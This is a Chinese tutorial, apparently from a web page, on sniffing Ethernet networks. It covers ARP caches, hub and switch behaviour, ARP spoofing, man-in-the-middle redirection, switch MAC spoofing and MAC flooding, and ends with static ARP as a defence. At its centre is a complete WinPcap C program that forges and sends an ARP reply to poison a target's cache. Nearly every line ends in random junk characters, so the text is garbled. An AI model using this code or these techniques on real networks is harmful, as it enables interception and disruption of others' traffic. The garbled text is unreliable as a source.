以太网内的嗅探(sniff)对于网络安全来说并不是什么好事，虽然对于网络管理员能够跟踪数据包并且发现网络问题，但是如果被破坏者利用的话，就对整个网络构成严重的安全威胁。至于嗅探的好处和坏处就不罗嗦了。 @ogv92B)d  
t}7KIMR  
　　ARP缓存表假设这样一个网络: )Fdm&D  
M/[jj+Hh  
　　—————————— oMt2^WkzvE  
　　| HUB | +>Au 79y|  
　　—————————— X3QrKyPh  
　　HostA HostB HostC >m^Nz7  
T$gfp  
ASxiv[  
　　其中: C% hBrAu61  
p
$>l3"q  
　　A的地址为:IP:192.168.10.1 MAC: AA-AA-AA-AA-AA-AA aLZ'CW-L  
　　B的地址为:IP:192.168.10.2 MAC: BB-BB-BB-BB-BB-BB SnieBWrs  
　　C的地址为:IP:192.168.10.3 MAC: CC-CC-CC-CC-CC-CC p[)29  
yUOgcS3  
) &QyY  
　　假设B是属于一个嗅探爱好者的，比如A机器的ARP缓存: 5B4e\]S>  
["qXWpX  
　　C:\>arp -a b
A o}[  
　　Interface: 192.168.10.1 on Interface 0x1000003 N<=Iw|g  
　　Internet Address Physical Address Type Q{KA!Rr_  
　　192.168.10.3 CC-CC-CC-CC-CC-CC dynamic KY-\vR<  
x{?pNB*Ci  
SiFS-Z59  
　　这是192.168.10.1机器上的ARP缓存表，假设，A进行一次ping 192.168.10.3操作，PING主机C，会查询本地的ARP缓存表，找到C的IP地址的MAC地址，那么就会进行数据传输，目的地就是C 的MAC地址。如果A中没有C的ARP记录，那么A首先要广播一次ARP请求，当C接收到A 的请求后就发送一个应答，应答中包含有C的MAC地址，然后A接收到C的应答，就会更新本地的ARP缓存。接着使用这个MAC地址发送数据(由网卡附加MAC地址)。因此，本地高速缓存的这个ARP表是本地网络流通的基础，而且这个缓存是动态的。 E3,8L~T  
FP0O}LF  
　　集线器网络(Hub-Based) y_[PBZ\ZU  
z5@wQb4TG  
　　很多网络都是用Hub进行连接的。数据包经过Hub传输到其他计算机的时候，Hub只是简单地把这个数据包广播到Hub的所有端口上。这就是上面举例中的一种网络结构。 a[!NY d  
 MT'i6t  
　　现在A需要发送TCP数据包给C。首先，A需要检查本地的ARP 缓存表，查看是否有IP为192.168.10.3即C的ARP记录，如果没有那么A将要广播一个ARP请求，当C接收到这个请求后，就作出应答，然后A更新自己的ARP缓存表。并获得与C的IP相对应的MAC地址。这时就传输这个TCP数据包，Ethernet帧中就包含了C的MAC地址。当数据包传输到HUB的时候，HUB直接把整个数据包广播到所有的端口，然后C就能够接收到A发送的数据包。 Vo hzSTi  
X+S=U+  
　　正因为HUB把数据广播到所有的端口，所以计算机B也能够收到A发送给C的数据包。这正是达到了B嗅探的目的。因此，Hub-Based的网络基本没有安全可言，嗅探在这样的网络中非常容易。 WziQ0\O*  
YGp4KS)  
　　交换网络(Switched Lan) +%T(V2~qw1  
LYk>m&x2a  
　　交换机用来代替HUB，正是为了能够解决HUB的几个安全问题，其中就是能够来解决嗅探问题。Switch不是把数据包进行端口广播，它将通过自己的ARP缓存来决定数据包传输到那个端口上。因此，在交换网络上，如果把上面例子中的HUB换为Switch，B就不会接收到A发送给C的数据包，即便设置网卡为混杂模式，也不能进行嗅探。 t&$)?ek 2  
B<F(A[6  
　　ARP欺骗(ARP spoofing) Od-A3U5+W  
*7A
>5[  
　　ARP协议并不只在发送了ARP请求才接收ARP应答。当计算机接收到ARP应答数据包的时候，就会对本地的ARP缓存进行更新，将应答中的IP和MAC地址存储在ARP缓存中。因此，在上面的假设网络中，B向A发送一个自己伪造的ARP应答，而这个应答中的数据为发送方IP地址是192.168.10.3(C的IP地址)，MAC地址是DD-DD-DD-DD-DD-DD(C的MAC地址本来应该是CC-CC-CC-CC-CC-CC，这里被伪造了)。当A接收到B伪造的ARP应答，就会更新本地的ARP缓存(A可不知道被伪造了)。现在A机器的ARP缓存更新了: hn|T7}  
c9P4V
P<|S  
　　C:\>arp -a Ap#hLp  
　　Interface: 192.168.10.1 on Interface 0x1000003 .Kd6cCD  
　　Internet Address Physical Address Type 27-?^T.[  
　　192.168.10.3 DD-DD-DD-DD-DD-DD dynamic v9_.i~Nl8  
*Z&i{Daitn  
|DS$*j+m  
　　这可不是小事。局域网的网络流通可不是根据IP地址进行，而是按照MAC地址进行传输。现在192.168.10.3的MAC地址在A上被改变成一个本不存在的MAC地址。现在A开始Ping 192.168.10.3，网卡递交的MAC地址是DD-DD-DD-DD-DD-DD，结果是什么呢?网络不通，A根本不能Ping通C!!这就是一个简单的ARP欺骗。 |2%V;>SG  
co"!mGC?"  
　　我们来实现这样的ARP欺骗。这里需要使用一个WinPcap提供的API和驱动。(http://winpcap.polito.it/)，winpcap是一个伟大而且开放的项目。Windows环境下的nmap、snort、windump都是使用的winpcap。 @>l88  
rk^ n4t  
　　// ARP Sender #jT_tV4H  
　　#include "stdafx.h" S54%"(e  
　　#include "Mac.h" //GetMacAddr()，我写的把字符串转换为MAC地址的函数，就不列在这里了 eyGRkXJ&
$  
　　#include ^k_1lySm#  
　　#include u$7X&{CZy  
　　#define EPT_IP 0x0800 /* type: IP */ p<Wbmk>  
　　#define EPT_ARP 0x0806 /* type: ARP */ 4~,ZdC  
　　#define EPT_RARP 0x8035 /* type: RARP */ /TP 4nn  
　　#define ARP_HARDWARE 0x0001 /* Dummy type for 802.3 frames */ )qv1\5g3  
　　#define ARP_REQUEST 0x0001 /* ARP request */ ]5oNI4.  
　　#define ARP_REPLY 0x0002 /* ARP reply */ $@,2fk6;)  
　　#define Max_Num_Adapter 10 /p*Op^Mp  
　　#pragma pack(push, 1) kb',s  
　　typedef struct ehhdr %|Z_S@S1y  
　　{ sR+oOan9  
　　unsigned char eh_dst[6]; /* destination ethernet addrress */ p;Q.,trNzA  
　　unsigned char eh_src[6]; /* source ethernet addresss */ &gR@[7P6  
　　unsigned short eh_type; /* ethernet pachet type */ BySAc5_-  
　　}EHHDR, *PEHHDR; ce 9V[2'  
　　typedef struct arphdr k,Q9zLJ  
　　{ }[GpJ*8  
　　unsigned short arp_hrd; /* format of hardware address */ X[g4Ry3  
　　unsigned short arp_pro; /* format of protocol address */ wC9rf 'fY  
　　unsigned char arp_hln; /* length of hardware address */ PXV%jclfS  
　　unsigned char arp_pln; /* length of protocol address */ xlMB 4  
　　unsigned short arp_op; /* ARP/RARP operation */ .yJ$B$c.%k  
　　unsigned char arp_sha[6]; /* sender hardware address */ F)MU@`vc"$  
　　unsigned long arp_spa; /* sender protocol address */ j1K(ER
w  
　　unsigned char arp_tha[6]; /* target hardware address */ An#i&0  
　　unsigned long arp_tpa; /* target protocol address */ YtPibpv0  
　　}ARPHDR, *PARPHDR; Q;Ol'-_h  
　　typedef struct arpPacket #Tn 24x`  
　　{ 0jkmTArN  
　　EHHDR ehhdr; `
c C_e[e  
　　ARPHDR arphdr; `#AK1' a#  
　　} ARPPACKET, *PARPPACKET; >rv@<S!b  
　　#pragma pack(pop) Ba7p!g  
　　int main(int argc, char* argv[]) v$:yd/o $  
　　{ 2*Y.
j]T  
　　static char AdapterList[Max_Num_Adapter][1024]; vS!nw&wNgh  
　　char szPacketBuf[600]; EyEW^m!$  
　　char MacAddr[6]; OxR7cpp#.  
　　LPADAPTER lpAdapter; 4ZO"hR  
　　LPPACKET lpPacket; |r ZOzY  
　　WCHAR AdapterName[2048]; 4IU(.m~@w  
　　WCHAR *temp,*temp1; :6 $TKu  
　　ARPPACKET ARPPacket; .g&VJRmT  
　　ULONG AdapterLength = 1024; !T <FL
^9  
　　int AdapterNum = 0; 2Gj'`I r3  
　　int nRetCode, i; <GD=b>`  
//Get The list of Adapter omT\h\)0<  
　　if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE) F=L"s5(?_}  
　　{  8TZprAeG  
　　printf("Unable to retrieve the list of the adapters!\n"); X+.Q6_0j<  
　　return 0; iHKmL>
  
　　} F4eCF  
　　temp = AdapterName; p$LuEZgc  
　　temp1=AdapterName; HE'%d>*qB  
　　i = 0; #W)
,=N  
　　while ((*temp != '\0')||(*(temp-1) != '\0')) JJ_+nTjC6  
　　{ _9_h#%P|~  
　　if (*temp == '\0') fr\NS<~u  
　　{ b23zW+nD  
　　memcpy(AdapterList,temp1,(temp-temp1)*2); h[>38E>  
　　temp1=temp+1; Ii9g7=&  
　　i++; &#K0/fw<a  
　　} '9l|z(!e  
　　temp++; k+S# &S  
　　} go -;  
　　AdapterNum = i; KB%%Fu  
　　for (i = 0; i < AdapterNum; i++) n~59Xxg[{  
　　wprintf(L"\n%d- %s\n", i+1, AdapterList); *etsdLm  
　　printf("\n"); j!9]Owg  
　　//Default open the 0 ^M3)`^Ai  
　　lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[0]); hAGS'`2  
　　//取第一个网卡(假设啦) _~XfuN  
　　if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) lb>el r  
　　{ PNDya  
　　nRetCode = GetLastError(); Vm*qfJt  
　　printf("Unable to open the driver, Error Code : %lx\n", nRetCode); P$"v|O
  
　　return 0; \Ovm  
　　} p's74]Lw  
　　lpPacket = PacketAllocatePacket(); &Ux?MO3uVh  
　　if(lpPacket == NULL) f'nB4[9  
　　{ $D=Ih-])  
　　printf("\nError:failed to allocate the LPPACKET structure."); 6:ERL+r37  
　　return 0; Nk:?q>  
　　} WPNK$k4  
　　ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); `6gel{2T  
　　if (!GetMacAddr("BBBBBBBBBBBB", MacAddr)) .~JGb0b4  
　　{ oYVz$ 0B+{  
　　printf ("Get Mac address error!\n"); q~F,h}m  
　　} ;C9;. VpBR  
　　memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6); //源MAC地址 <5]%0?y  
　　if (!GetMacAddr("AAAAAAAAAAAA", MacAddr)) "32<g_) $  
　　{ .U%s;o[]  
　　printf ("Get Mac address error!\n"); f @A>o/P)  
　　return 0; RX|n  
　　} >Xpuo  
　　memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6); //目的MAC地址。(A的地址) tni!Gz1  
　　ARPPacket.ehhdr.eh_type = htons(EPT_ARP); 'i,<.{Ss  
　　ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE); [c)Hd#*<l  
　　ARPPacket.arphdr.arp_pro = htons(EPT_IP); naz?&4Cc  
　　ARPPacket.arphdr.arp_hln = 6; S5G8=%  
　　ARPPacket.arphdr.arp_pln = 4; +hpQGT"P  
　　ARPPacket.arphdr.arp_op = htons(ARP_REPLY); |$hYi}*)5  
　　if (!GetMacAddr("DDDDDDDDDDDD", MacAddr))  2xbVT:  
　　{ y
HZyh#}  
　　printf ("Get Mac address error!\n"); 6)JQgO)  
　　return 0; <rI_yU6  
　　} V"7w6Zf)  
　　memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6); //伪造的C的MAC地址 /qt8&HEsh  
　　ARPPacket.arphdr.arp_spa = inet_addr("192.168.10.3"); //C的IP地址 ]v`7x}B8G  
　　if (!GetMacAddr("AAAAAAAAAAAA", MacAddr)) lmR9L 3  
　　{ d %(1*  
　　printf ("Get Mac address error!\n"); rf(^wNzVc?  
　　return 0; 77cyzS|C  
　　} #U7"XAVem  
　　memcpy(ARPPacket.arphdr.arp_tha , MacAddr, 6); //目标A的MAC地址 S2fuNKm  
　　ARPPacket.arphdr.arp_tpa = inet_addr("192.168.10.1"); //目标A的IP地址 ]QU!&-  
　　memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket)); Z'Y$'4'  
　　PacketInitPacket(lpPacket, szPacketBuf, 60); }2HC?6.&s  
　　if(PacketSetNumWrites(lpAdapter, 2)==FALSE) *#)gC~<'  
　　{ !H;st'[  
　　printf("warning: Unable to send more than one packet in a single write!\n"); at0nUs  
　　} `BfF$?  
　　if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE) :Cb@z=$:  
　　{ wq.:nP`c  
　　printf("Error sending the packets!\n"); [ c7anB  
　　return 0;
S8}&kD  
　　} Lwp4A[A  
　　printf ("Send ok!\n"); ]
]xxooe  
　// close the adapter and exit _T8Dn|w  
　　PacketFreePacket(lpPacket); ?g'
JwA  
　　PacketCloseAdapter(lpAdapter); s%*%P[N!  
　　return 0; # ^o#/n\  
　　} %L. Nw<h  
Y
zZN/)7  
　　于是A接收到一个被伪造的ARP应答。A被欺骗了!!倘若在局域网中看某某机器不顺眼，……以太网中的嗅探太有作用了，但是交换网络对嗅探进行了限制，让嗅探深入程度大打折扣。不过，很容易就能够发现，主机、Switch(动态更新地址表类型，下同)中的缓存表依然是(主要是)动态的。要在一个交换网络中进行有效的嗅探工作(地下党?)，需要采用对付各种缓存表的办法，连骗带哄，甚至乱踹，在上面的ARP欺骗基础中我们就能够做到。 3"
hs`|J  
pp{g*\d6  
　　对目标进行ARP欺骗 j@7|2*Z:m'  
v2U5XS=EST  
　　就象上面程序中实现的一样，对目标A进行欺骗，A去Ping主机C却发送到了DD-DD-DD-DD-DD-DD这个地址上。如果进行欺骗的时候，把C的MAC地址骗为BB-BB-BB-BB-BB-BB，于是A发送到C上的数据包都变成发送给B的了。这不正好是B能够接收到A发送的数据包了么，嗅探成功。 U^l_@9.8  
L{\y.l  
　　A对这个变化一点都没有意识到，但是接下来的事情就让A产生了怀疑。因为A和C连接不上了!!B对接收到A发送给C的数据包可没有转交给C。做“man in the middle”,进行ARP重定向。打开B的IP转发功能，A发送过来的数据包，转发给C，好比一个路由器一样。不过，假如B发送ICMP重定向的话就中断了整个计划。直接进行整个包的修改转发，捕获到A发送给的数据包，全部进行修改后再转发给C，而C接收到的数据包完全认为是从A发送来的。不过，C发送的数据包又直接传递给A，倘若再次进行对C的ARP欺骗。现在B就完全成为A与C的中间桥梁了。 .Nm
VTHMQ  
<fqxw;;7~=  
　　对Switch的MAC欺骗 _
/qBv-U'  
G8)1gFm  
　　Switch上同样维护着一个动态的MAC缓存，它一般是这样，首先，交换机内部有一个对应的列表，交换机的端口对应MAC地址表Port n <-> Mac记录着每一个端口下面存在那些MAC地址，这个表开始是空的，交换机从来往数据帧中学习。举例来说，当Port 1口所接的计算机发出了一个数据帧，这帧数据从Port 1进入交换机，交换机就取这个数据帧的原MAC地址AAAA，然后在地址表中记录:Port 1 <-> AAAA, 以后，所有发向MAC地址为AAAA的数据帧，就全从Port 1口输出，而不会从其它的口输出。 8iSUSk\V  
p33sD\~  
　　跟前面对目标进行欺骗相类似。如果把Switch上的MAC-PORT表修改了，那么对应的MAC和PORT就一样跟着改变，本来不应该发送到嗅探器的数据结果发送过来了，这样也达到了嗅探的目的。修改本地(B)发送的数据包MAC地址为原来A的MAC地址，当经过交换机的时候，交换机发现端口B对应的地址是机器A的MAC地址，于是就将会把A的MAC地址同端口B相对应，从而把发送给A的数据从端口B传输了，本来这些应该是传送到端口A的。因此，从机器B就能够获得发送给A的数据。 .><Q[Uq4|  
v^Q~U  
　　但是，这里有一个问题，A将接收不到数据了。嗅探不目的并不是要去破坏正常的数据通讯。同时，从刚才的欺骗中，让交换机中一个MAC地址对应了多个端口，这种对于交换机处理还不清楚。还请多指教。
B`,9Y)   
jL_ITP  
　　对Switch进行Flood @mD*K*M  
sn\8nPD  
　　就象上面介绍Switch的MAC和Port对应关系形成的原理，因为MAC-PORT缓存表是动态更新的，那么让整个Switch的端口表都改变，对Switch进行MAC地址欺骗的Flood，不断发送大量假MAC地址的数据包，Switch就更新MAC-PORT缓存，如果能通过这样的办法把以前正常的MAC和Port对应的关系破坏了，那么Switch就会进行泛洪发送给每一个端口，让Switch基本变成一个HUB，向所有的端口发送数据包，要嗅探的目的一样能够达到。 `V g?wCE}  
$%U]fVj{J  
　　存在的问题，Switch对这种极限情况的处理，因为属于不正常情况，可能会引起包丢失情况。而且现在对这种极限情况的Switch状态还很不了解。如果对网络通讯造成了大的破坏，这不属于正常的嗅探(嗅探也会引起一些丢失)。 :?PG%  
sBrpJc  
　　对Switch进行各种手段的操作，需要小心，如果打开了端口保护，那么可能会让交换机关闭所有用户。因此，对交换机这样的设备进行欺骗或者其他操作，还不如对一些上级设备进行欺骗，比如目标主机或者路由器。 ^3fz5GH~  
L0G]21XB  
　　至于上面关于嗅探的手段都是基于这个动态表进行的。因此，使用静态的ARP就能够进行防范了。对于WIN，使用arp -s 来进行静态ARP的设置。